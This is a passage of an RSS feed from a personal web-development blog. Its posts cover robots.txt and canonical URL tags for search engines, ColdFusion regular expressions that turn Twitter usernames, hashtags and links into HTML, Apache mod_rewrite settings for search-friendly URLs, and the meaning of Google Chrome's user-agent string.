Using a <a href="http://www.robotstxt.org" title="Robots.txt" target="_blank" rel="nofollow">robots.txt</a> file, you can disallow crawling of login pages, contact forms, shopping carts, and other pages whose sole functionality is something that a crawler can&#8217;t and shouldn&#8217;t perform. This lets crawlers spend more of their time crawling content that they can actually do something with.
</li>
<li><strong>Prevent duplicate content.</strong><br />
An ideal scenario for crawlers is a one-to-one link between content an a <abbr title="Universal Resource Locator">URL</abbr>. Each <abbr title="Universal Resource Locator">URL</abbr> leads to a unique bit of content and each piece of content can be accessed by a unique <abbr title="Universal Resource Locator">URL</abbr>. The closer your site can get to this scenario, the more streamlined your site will be for crawling and indexing. If your CMS makes this difficult to achieve, you can use the <a href="/canonical-urls-what-are-they-all-about">canonical tag</a> to indicate a preferred <abbr title="Universal Resource Locator">URL</abbr> for duplicate content.
</li>
</ul>
<p>More information on this topic can be found on the <a href="http://sites.google.com/site/webmasterhelpforum/en/faq--crawling--indexing---ranking#duplicate-content" title="Google Webmaster Central Blog" target="_blank" rel="nofollow">Google Webmaster Central Blog</a>.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/optimise-your-urls-for-web-crawlers-and-indexing/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Canonical URLs &#8211; What Are They All About?</title>
		<link>http://www.simonwhatley.co.uk/canonical-urls-what-are-they-all-about</link>
		<comments>http://www.simonwhatley.co.uk/canonical-urls-what-are-they-all-about#comments</comments>
		<pubDate>Wed, 07 Oct 2009 09:34:23 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Analytics]]></category>
		<category><![CDATA[Search]]></category>
		<category><![CDATA[Canonical]]></category>
		<category><![CDATA[Duplicate content]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[search engine]]></category>
		<category><![CDATA[search engine optimisation]]></category>
		<category><![CDATA[Search engine optimization]]></category>
		<category><![CDATA[search engines]]></category>
		<category><![CDATA[search results]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Uniform Resource Identifier]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[web application]]></category>
		<category><![CDATA[Yahoo]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=2043</guid>
		<description><![CDATA[Carpe diem on any duplicate content worries: Google, Yahoo and Microsoft now support a format that allows you to publicly specify your preferred version of a URL. If your site has identical or vastly similar content that’s accessible through multiple URLs, this format provides you with more control over the URL returned in search results. It also helps to make sure that properties such as link popularity are consolidated to your preferred version.]]></description>
			<content:encoded><![CDATA[<p>Google announced as long ago as February, in their official <a href="http://googlewebmastercentral.blogspot.com/2009/02/specify-your-canonical.html" title="" target="_blank" rel="nofollow ">Webmaster Central Blog</a> a new canonical <abbr title="Universal Resource Locator">URL</abbr> tag:</p>
<blockquote><p>Carpe diem on any duplicate content worries: we now support a format that allows you to publicly specify your preferred version of a URL. If your site has identical or vastly similar content that&#8217;s accessible through multiple URLs, this format provides you with more control over the URL returned in search results. It also helps to make sure that properties such as link popularity are consolidated to your preferred version.</p></blockquote>
<p>But what do they mean by <q>canonical</q>? One of the definitions of <q>canonical</q> is <q>reduced to the simplest and most significant form possible without loss of generality.</q></p>
<p>What this means is that if you have a page&#8211;let&#8217;s take an e-commerce product page&#8211;and the simplest <abbr title="Universal Resource Locator">URL</abbr> that you want it accessible by is:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">http://www.site.com/category/product.html</pre></div></div>

<p>you can add the canonical tag to that specific product. Google, Yahoo and Microsoft use this tag to tell their search engines which <abbr title="Universal Resource Locator">URL</abbr> it should have for the current page.</p>
<p>Now, let&#8217;s say that the particular software you use <strong>also</strong> allows you to access the same product using:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">http://www.site.com/company/product.html</pre></div></div>

<p>and</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">http://www.site.com/different_category/product.html</pre></div></div>

<p>Perhaps this one product is in multiple categories. With this tag in place when any of the alternate pages are loaded this tag notifies any search engine that this is really the same product as the page you defined in the canonical tag. So, you are still allowed to have the content available as generally needed (by categories, tags, or some other organisation system) and still avoid having the content duplicated and penalised.</p>
<p>To implement the canonical <abbr title="Universal Resource Locator">URL</abbr> tag in your web application, you simply need to do the following inside the <code>&lt;head&gt;</code> section of the duplicate content URLs:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">&lt;link rel=&quot;canonical&quot; href=&quot;http://www.site.com/category/product.html&quot; /&gt;</pre></div></div>

<p>As Google mention, this tag is a hint that they <q>honour strongly</q>. Google will take your preference into account, in conjunction with other signals, when calculating the most relevant page to display in search results.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/canonical-urls-what-are-they-all-about/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Parsing Twitter Usernames, Hashtags and URLs with ColdFusion</title>
		<link>http://www.simonwhatley.co.uk/parsing-twitter-usernames-hashtags-and-urls-with-coldfusion</link>
		<comments>http://www.simonwhatley.co.uk/parsing-twitter-usernames-hashtags-and-urls-with-coldfusion#comments</comments>
		<pubDate>Fri, 01 May 2009 11:24:07 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[ColdFusion]]></category>
		<category><![CDATA[GPS]]></category>
		<category><![CDATA[GPS logger]]></category>
		<category><![CDATA[Holux M-241 GPS Receiver]]></category>
		<category><![CDATA[HTML]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[New Brunswick]]></category>
		<category><![CDATA[online resource]]></category>
		<category><![CDATA[parsing]]></category>
		<category><![CDATA[tag]]></category>
		<category><![CDATA[Twitter]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[username]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=1907</guid>
		<description><![CDATA[Some time ago, well almost a year ago actually, I posted an article called Parsing Twitter Usernames, Hashtags and URLs with JavaScript. From that article, it became immediately apparent that this was an issue many people were confronting and one that required an answer. Now, belatedly, it is the turn of ColdFusion to get the Twitter love.]]></description>
			<content:encoded><![CDATA[<p>Some time ago, well almost a year ago actually, I posted an article called <a href="/parsing-twitter-usernames-hashtags-and-urls-with-javascript">Parsing Twitter Usernames, Hashtags and URLs with JavaScript</a>. From that article, it became immediately apparent that this was an issue many people were confronting and one that required an answer. Now, belatedly, it is the turn of ColdFusion to get the Twitter love.</p>
<p>Compared to JavaScript it is far easier to parse the <abbr title="Univeral Resource Locator">URL</abbr>s, Usernames and Hashtags in a tweet using ColdFusion and minor amendments to the regular expressions used in the JavaScript code.</p>
<p>Below is an example tweet that I&#8217;ll use for this post.</p>

<div class="wp_syntax"><div class="code"><pre class="cfm" style="font-family:monospace;"><span style="color: #333333;"><span style="color: #800000;">&lt;cfset</span> myTweet <span style="color: #0000ff">=</span> <span style="color: #009900;">&quot;Woot! I've just taken receipt of my Holux M-241 GPS logger. Good call @fordie. http://bit.ly/2RsAu ##holux ##gpslogger&quot;</span> <span style="color: #0000ff;">/</span><span style="color: #800000;">&gt;</span></span></pre></div></div>

<p><abbr title="Nota bene (please note)">NB</abbr>. For the purpose of this test, I need to double-hash the hashtags to prevent ColdFusion throwing an error.</p>
<h3>Parsing URLs as Links to the resource</h3>
<p>We can simply demonstrate the parsing of the link with the following code in the body of the page:</p>

<div class="wp_syntax"><div class="code"><pre class="cfm" style="font-family:monospace;"><span style="color: #333333;"><span style="color: #800000;">&lt;cfset</span> myTweet <span style="color: #0000ff">=</span> <span style="color: #800080;">REReplace</span><span style="color: #000000;">&#40;</span>myTweet,<span style="color: #009900;">'([A-Za-z]+:\/\/[A-Za-z0-9-_]+\.[A-Za-z0-9-_:%&amp;amp;\?\/.=]+)'</span>,<span style="color: #009900;">'&lt;a href=&quot;\1&quot;&gt;</span></span>\1<span style="color: #333333;"><span style="color: #800000;">&lt;</span><span style="color: #0000ff;">/</span>a<span style="color: #0000ff;">&gt;</span></span>','ALL') /&gt;</pre></div></div>

<p><abbr title="Nota bene (please note)">NB</abbr>. The <code>\1</code> is a back reference to part of the regular expression match. A backreference stores the part of the string matched by the part of the regular expression inside the parentheses. This means you can reuse it inside the regular expression, or afterwards as I am doing in each of these examples.</p>
<p>The resultant HTML generated is the following:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">Woot! I've just taken receipt of my Holux M-241 GPS logger. Good call @fordie. &lt;a href=&quot;http://bit.ly/2RsAu&quot;&gt;http://bit.ly/2RsAu&lt;/a&gt; #holux #gpslogger</pre></div></div>

<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<h3>Parsing Usernames as Links to Twitter</h3>
<p>Following on from the <abbr title="Universal Resource Locator">URL</abbr> example above, we can apply a similar methodology to Twitter usernames since they can also be <abbr title="Universal Resource Locator">URL</abbr>s to their associated Twitter page.</p>
<p>We can simply demonstrate this with the following code:</p>

<div class="wp_syntax"><div class="code"><pre class="cfm" style="font-family:monospace;"><span style="color: #333333;"><span style="color: #800000;">&lt;cfset</span> myTweet <span style="color: #0000ff">=</span> <span style="color: #800080;">REReplace</span><span style="color: #000000;">&#40;</span>myTweet,<span style="color: #009900;">'[@]+([A-Za-z0-9-_]+)'</span>,<span style="color: #009900;">'&lt;a href=&quot;http://twitter.com/\1&quot; rel=&quot;nofollow&quot;&gt;</span></span>@\1<span style="color: #333333;"><span style="color: #800000;">&lt;</span><span style="color: #0000ff;">/</span>a<span style="color: #0000ff;">&gt;</span></span>','ALL') /&gt;</pre></div></div>

<p>The regular expression in this case finds all instances of <code>@username</code>. The Twitter <abbr title="Universal Resource Locator">URL</abbr> is then applied to the username.</p>
<p>The resultant HTML generated is the following:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">Woot! I've just taken receipt of my Holux M-241 GPS logger. Good call &lt;a href=&quot;http://twitter.com/fordie&quot; rel=&quot;nofollow&quot;&gt;@fordie&lt;/a&gt;. http://bit.ly/2RsAu #holux #gpslogger</pre></div></div>

<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<h3>Parsing Hashtags as Links to Twitter’s Search</h3>
<p>Finally, Twitter also allows user’s to create Hastags within their posts. Hashtags are a community-driven convention for adding additional context and metadata to your tweets. Like regular <abbr title="Universal Resource Locator">URL</abbr>s and usernames, Hastags can been parsed as a <abbr title="Universal Resource Locator">URL</abbr> to an online resource, in this case, Twitter’s search.</p>
<p>We can simply demonstrate this with the following code:</p>

<div class="wp_syntax"><div class="code"><pre class="cfm" style="font-family:monospace;"><span style="color: #333333;"><span style="color: #800000;">&lt;cfset</span> myTweet <span style="color: #0000ff">=</span> <span style="color: #800080;">REReplace</span><span style="color: #000000;">&#40;</span>myTweet,<span style="color: #009900;">'[##]+([A-Za-z0-9-_]+)'</span>,<span style="color: #009900;">'&lt;a href=&quot;http://search.twitter.com/search?q=%23\1&quot; rel=&quot;nofollow&quot;&gt;</span></span><span style="color: #0000ff;">##</span>\1<span style="color: #333333;"><span style="color: #800000;">&lt;</span><span style="color: #0000ff;">/</span>a<span style="color: #0000ff;">&gt;</span></span>','ALL') /&gt;</pre></div></div>

<p>The regular expression in this case finds all instances of <code>#hashtag</code>. The Twitter Search <abbr title="Universal Resource Locator">URL</abbr> is then applied to the hashtag.</p>
<p>The resultant HTML generated is the following:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">Woot! I've just taken receipt of my Holux M-241 GPS logger. Good call @fordie. http://bit.ly/2RsAu &lt;a href=&quot;http://search.twitter.com/search?q=%23holux&quot; rel=&quot;nofollow&quot;&gt;#holux&lt;/a&gt; &lt;a href=&quot;http://search.twitter.com/search?q=%23ipslogger&quot; rel=&quot;nofollow&quot;&gt;#gpslogger&lt;/a&gt;</pre></div></div>

<h3>All in one</h3>
<p>So, putting all the regular expressions together, you would end up with the following:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">Woot! I've just taken receipt of my Holux M-241 GPS logger. Good call &lt;a href=&quot;http://twitter.com/fordie&quot; rel=&quot;nofollow&quot;&gt;@fordie&lt;/a&gt;. &lt;a href=&quot;http://bit.ly/2RsAu&quot;&gt;http://bit.ly/2RsAu&lt;/a&gt; &lt;a href=&quot;http://search.twitter.com/search?q=%23holux&quot; rel=&quot;nofollow&quot;&gt;#holux&lt;/a&gt; &lt;a href=&quot;http://search.twitter.com/search?q=%23gpslogger&quot; rel=&quot;nofollow&quot;&gt;#ipslogger&lt;/a&gt;</pre></div></div>

<p>Which translates as the more useful tweet:</p>
<p>Woot! I&#8217;ve just taken receipt of my Holux M-241 GPS logger. Good call <a href="http://twitter.com/fordie" rel="nofollow">@fordie</a>. <a href="http://bit.ly/2RsAu">http://bit.ly/2RsAu</a> <a href="http://search.twitter.com/search?q=%23holux" rel="nofollow">#holux</a> <a href="http://search.twitter.com/search?q=%23gpslogger" rel="nofollow">#gpslogger</a></p>
<h3>Where to take it next</h3>
<p>Wrap these code snippets up into <a href="/examples/twitter/twitterise/twitterise.txt">a simple twitterise function</a> could be a good starter for ten. Following that, we could also create a simple Twitter feed reader, but I&#8217;ll leave that up to you to develop.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/parsing-twitter-usernames-hashtags-and-urls-with-coldfusion/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Enabling Search Engine Safe URLs with Apache and htaccess</title>
		<link>http://www.simonwhatley.co.uk/enabling-search-engine-safe-urls-with-apache-and-htaccess</link>
		<comments>http://www.simonwhatley.co.uk/enabling-search-engine-safe-urls-with-apache-and-htaccess#comments</comments>
		<pubDate>Mon, 08 Dec 2008 15:57:15 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Search]]></category>
		<category><![CDATA[.htaccess]]></category>
		<category><![CDATA[All]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[ColdBox]]></category>
		<category><![CDATA[ColdFusion]]></category>
		<category><![CDATA[Fusebox]]></category>
		<category><![CDATA[HTTP]]></category>
		<category><![CDATA[httpd.conf]]></category>
		<category><![CDATA[ISAPI]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[mod_rewrite]]></category>
		<category><![CDATA[New Brunswick]]></category>
		<category><![CDATA[None]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[search engine]]></category>
		<category><![CDATA[search engine optimisation]]></category>
		<category><![CDATA[search engine robots]]></category>
		<category><![CDATA[search engine safe]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[URL rewriting]]></category>
		<category><![CDATA[USD]]></category>
		<category><![CDATA[web applications]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=1635</guid>
		<description><![CDATA[An increasingly popular technique among websites and in particular, blogs, is the idea of making URLs search engine friendly, or safe, on the premise that doing so will help search engine optimisation. By removing the obscure query string element of a URL and replacing it with keyword rich alternatives, not only makes it more readable for a human being, but also the venerable robots that allow our page content to be found in the first place.]]></description>
			<content:encoded><![CDATA[<p>An increasingly popular technique among websites and in particular, blogs, is the idea of making <abbr title="Universal Resource Locator">URL</abbr>s search engine friendly, or safe, on the premise that doing so will help search engine optimisation. By removing the obscure query string element of a <abbr title="Universal Resource Locator">URL</abbr> and replacing it with keyword rich alternatives, not only makes it more readable for a human being, but also the venerable robots that allow our page content to be found in the first place.</p>
<p>For example, the following is WordPress&#8217; default URL configuration for a post:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">http://www.domain.com/?p=1635</pre></div></div>

<p>However, buy using a URL-rewriting available in the Apache webserver, we can achieve a far better result, such as the following:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">http://www.domain.com/search-engine-safe-urls</pre></div></div>

<p>NB. It is also possible to achieve a similar result with an <abbr title="Internet Server Application Programming Interface">ISAPI</abbr> rewrite for Microsoft&#8217;s <abbr title="Internet Information Server">IIS</abbr> webserver, but this topic will not be included in this post.</p>
<p>To get your website working with <abbr title="search engine safe">SES</abbr> <abbr title="Universal Resource Locator">URL</abbr>s you need to enable both the <code>mod_rewite</code> module and <code>AllowOverride</code> directive in the Apache configuration file.</p>
<p>Uncomment (remove #) from the following to enable the re-write rule:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">LoadModule rewrite_module modules/mod_rewrite.so</pre></div></div>

<p>Change the <code>AllowOverride</code> directive from none to all</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">&lt;directory /&gt;
    Options FollowSymLinks
    AllowOverride all
    Order deny,allow
    Deny from all
&lt;/directory&gt;
&nbsp;
&lt;directory &quot;C:/WebRoot&quot;&gt;
    # Possible values for the Options directive are &quot;None&quot;, &quot;All&quot;,
    # or any combination of:
    #   Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews
    #
    # Note that &quot;MultiViews&quot; must be named *explicitly* --- &quot;Options All&quot;
    # doesn't give it to you.
    #
    # The Options directive is both complicated and important.  Please see
    # http://httpd.apache.org/docs/2.2/mod/core.html#options
    # for more information.
    #
    Options Indexes FollowSymLinks
&nbsp;
    #
    # AllowOverride controls what directives may be placed in .htaccess files.
    # It can be &quot;All&quot;, &quot;None&quot;, or any combination of the keywords:
    #   Options FileInfo AuthConfig Limit
    #
    AllowOverride All
&nbsp;
    #
    # Controls who can get stuff from this server.
    #
    Order allow,deny
    Allow from all
&lt;/directory&gt;</pre></div></div>

<p>On Apache webservers, <code>.htaccess</code> (hypertext access) is the default name of directory-level configuration files. An <code>.htaccess</code> file is placed in a particular directory, and the directives in the <code>.htaccess</code> file apply to that directory, and all its subdirectories. It provides the ability to customize configuration for requests to the particular directory. In our case, enabling search engine safe (<abbr title="search engine safe">SES</abbr>) <abbr title="Universal Resource Locator">URL</abbr>s.</p>
<p>By setting the <code>AllowOverride</code> directive to <q>All</q> in effect defers configuration settings to the <code>.htaccess</code> file.</p>
<p>An example <code>.htaccess</code> file could include the following code to rewrite the URLs:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php/$1 [L,QSA]</pre></div></div>

<p>Search engine friendly <abbr title="Universal Resource Locator">URL</abbr>s are implemented with Rewrite engines. The rewrite engine modifies the <abbr title="Universal Resource Locator">URL</abbr> based upon a number of rewrite conditions and rules.</p>
<p>The <code>RewriteBase</code> directive explicitly sets the base <abbr title="Universal Resource Locator">URL</abbr> for per-directory rewrites. The <code>RewriteCond</code> directive defines a rule condition, so in this case handling missing files or directories. Finally, the <code>RewriteRule</code> directive is the real rewriting workhorse. In this example, we&#8217;re getting everything in the <abbr title="Uniform Resource Identifier">URI</abbr> &#8212; i.e. not including the protocol (HTTP/S) and domain name &#8212; based upon a regular expression. This is then appended to the default file reference &#8212; index.php &#8212; as a <a href="http://www.regular-expressions.info/brackets.html" title="Regular Expression: back references" target="_blank" rel="nofollow">back reference</a>. The <code>[L,QSA]</code> refers to the rule being the last rule and append any query string parameters to the default file. It is important to note that this is all done on the server side, the user will never see the website address changing in the browser&#8217;s address bar. Furthermore, simply transposing the index.php filename with your default file name &#8212; e.g. index.cfm, default.aspx &#8212; will have the same result. Indeed, the above rewrite rules are becoming a de-facto standard for web applications.</p>
<p>To fully understand <code>mod_rewrite</code> rules above, look at the <a href="http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html" title="Apache mod_rewrite documentation" target="_blank" rel="nofollow">Apache mod_rewrite documentation</a>.</p>
<p>Once you have your <abbr title="Search Engine Safe">SES</abbr> functionality in place on the webserver, it is then the responsibility of your application framework to understand the <abbr title="Universal Resource Locator">URL</abbr> construction and handle it accordingly. Fortunately, frameworks such as <a href="http://www.coldboxframework.com" title="ColdBox Framework" target="_blank" rel="nofollow">ColdBox</a> and <a href="http://www.fusebox.org" title="Fusebox Framework" target="_blank" rel="nofollow" >Fusebox</a> for ColdFusion, <a href="http://framework.zend.com" title="Zend PHP framework" target="_blank" rel="nofollow">Zend</a> and <a href="http://www.symfony-project.com" title="Symfony PHP fraemwork" target="_blank" rel="nofollow">Symfony</a> for <abbr title="PHP Hypertext Precursor">PHP</abbr>, all contain functionality to do this, but that is the subject of an entirely different post.</p>
<p>Users of web applications prefer short, neat <abbr title="Universal Resource Locator">URL</abbr>s to raw query string parameters. A concise <abbr title="Universal Resource Locator">URL</abbr> is easy to remember, and less time-consuming to type in. If the <abbr title="Universal Resource Locator">URL</abbr> can be made to relate clearly to the content of the page, then errors are not only less likely to happen, but our good friends the search engine robots are able to draw a stronger assumption of the pages&#8217; relevance and content.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/enabling-search-engine-safe-urls-with-apache-and-htaccess/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>What&#039;s In Google Chrome&#039;s User-Agent String</title>
		<link>http://www.simonwhatley.co.uk/whats-in-google-chromes-user-agent-string</link>
		<comments>http://www.simonwhatley.co.uk/whats-in-google-chromes-user-agent-string#comments</comments>
		<pubDate>Fri, 12 Sep 2008 12:10:43 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[Browsers]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[Chrome's address bar]]></category>
		<category><![CDATA[encryption]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Google Chrome]]></category>
		<category><![CDATA[Google Inc.]]></category>
		<category><![CDATA[HTTP]]></category>
		<category><![CDATA[HyperText Transfer Protocol]]></category>
		<category><![CDATA[Internet Explorer]]></category>
		<category><![CDATA[Internet users]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[mobile phones]]></category>
		<category><![CDATA[Mozilla]]></category>
		<category><![CDATA[Official Build Google Inc.]]></category>
		<category><![CDATA[Opera]]></category>
		<category><![CDATA[operating system]]></category>
		<category><![CDATA[Safari]]></category>
		<category><![CDATA[United States]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[User Agent]]></category>
		<category><![CDATA[web crawlers]]></category>
		<category><![CDATA[Web Standards era]]></category>
		<category><![CDATA[webmaster]]></category>
		<category><![CDATA[windowing system]]></category>
		<category><![CDATA[Windows NT]]></category>
		<category><![CDATA[X11]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=1123</guid>
		<description><![CDATA[With the advent Google Chrome there has been a lot of media coverage regarding the browser’s uptake and how it will compete with Internet Explorer, Firefox and Safari. This is where the User Agent becomes most valuable.]]></description>
			<content:encoded><![CDATA[<p>With the advent <a href="http://www.google.com/chrome/" title="" target="_blank" rel="nofollow">Google Chrome</a> there has been a lot of media coverage regarding the browser&#8217;s uptake and how it will compete with Internet Explorer, Firefox and Safari. This is where the User Agent becomes most valuable. It can be used in analytics software to determine the browser share and consequently aid the development of the website.</p>
<p>But what is a User Agent? A User Agent is the client application used with a particular network protocol; the phrase is most commonly used in reference to those which access the Web. Web user agents range from web browsers and e-mail clients to search engine crawlers (<q>spiders</q>), as well as mobile phones, screen readers and braille browsers used by people with disabilities. When Internet users visit a web site, a text string is generally sent to identify the user agent to the server. This forms part of the <abbr title="HyperText Transfer Protocol">HTTP</abbr> request, prefixed with <strong>user-agent:</strong> and typically includes information such as the application name, version, host operating system, and language. Bots, such as web crawlers, often also include a <abbr title="Universal Resource Locator">URL</abbr> and/or e-mail address so that the webmaster can contact the operator of the bot.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<p>By simply typing <strong>about:version</strong> into Chrome&#8217;s address bar you will be presented with the following information:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">Google Chrome
0.2.149.29 (1798)
Official Build
Google Inc.
Copyright © 2006-2008 Google Inc. All Rights Reserved.
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13</pre></div></div>

<p>As you can see Chrome&#8217;s version information provides limited detail about the browser. The last line is the important one. It is the <abbr title="HyperText Transfer Protocol">HTTP</abbr> <em>User-Agent</em> header:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13.</pre></div></div>

<p>If you know the <a href="http://tools.ietf.org/html/rfc2616" title="RFC 2616 Hypertext Transfer Protocol - HTTP/1.1" target="_blank" rel="nofollow">RFC 2616</a> specification on the HyperText Transfer Protocol &#8212; which incidentally, I gladly don&#8217;t &#8212; you would know that the User Agent, or more formally, product token, should be short and to the point:</p>
<blockquote><p>
Product tokens SHOULD be short and to the point. They MUST NOT be used for advertising or other non-essential information. Although any token character MAY appear in a product-version, this token SHOULD only be used for a version identifier (i.e., successive versions of the same product SHOULD only differ in the product-version portion of  the product value).
</p></blockquote>
<p>Clearly this isn&#8217;t the case! One of Google&#8217;s reason&#8217;s behind creating the Chrome browser was to start afresh. It would have therefore been truely amazing if they had made the string simply <em>Chrome/0.2.149.27</em>.</p>
<p>Unfortunately, <a href="http://en.wikipedia.org/wiki/Browser_sniffing" title="Wikipedia: Browser Sniffing" target="_blank" rel="nofollow">browser sniffing</a> makes an ever-growing <abbr title="User-Agent">UA</abbr> string the path of least resistance for browser vendors.</p>
<p><script type="text/javascript"><!--
google_ad_client = "pub-6475233631580417";
/* 468x60 Basic */
google_ad_slot = "7117418273";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p>
<p>So, what does Chrome&#8217;s User Agent string actually mean:</p>
<ul>
<li><strong>Mozilla/</strong> &#8211; This means that browser has the kind of capabilities that Netscape 1.1 had compared to <a href="http://en.wikipedia.org/wiki/Mosaic_(web_browser)" title="Wikipedia: Mosaic Web Browser" target="_blank" rel="nofollow">Mosaic</a> and <a href="http://en.wikipedia.org/wiki/Lynx_(web_browser)" title="Wikipedia: Lynx Web Browser" target="_blank" rel="nofollow">Lynx</a>.</li>
<li><strong>5.0</strong> &#8211; This means that the browser engine is from the post-Browser War Web Standards era as opposed to being from the Browser War era.</li>
<li><strong>(Windows;</strong> &#8211; This means that general windowing system flavor the browser runs on is Windows (as opposed to, for example, Apple and X11).</li>
<li><strong>U;</strong> &#8211; This means that the browser has at least the level of <a href="http://en.wikipedia.org/wiki/User_agent#Encryption_strength_.22U.22_.2F_.22I.22_.2F_.22N.22" title="Wikipedia: Encryption Strength" target="_blank" rel="nofollow">cryptographic capability / encryption strength</a> that U.S. versions of browsers had in the late 1990s.</li>
<li><strong>Windows NT 6.0;</strong> &#8211; This indicates the operating system the browser is running on. In this instance, the browser is running on Vista.</li>
<li><strong>en-US)</strong> &#8211; This indicates the user interface language of the browser (U.S. English in this case). This may be used to choose between different <em>content</em> languages even though <abbr title="HyperText Transfer Protocol">HTTP</abbr> has a different header for that purpose.</li>
<li><strong>AppleWebKit/</strong> &#8211; This indicates that the engine of the browser is <a href="http://webkit.org/" title="Webkit opensource project" target="_blank" rel="nofollow">WebKit</a> as opposed to being <a href="http://developer.mozilla.org/en/Gecko" title="Mozilla: Gecko Layout Engine" target="_blank" rel="nofollow">Gecko</a>. Developers should not do user agent sniffing as a rule, but if they still do, this is what they should be sniffing.</li>
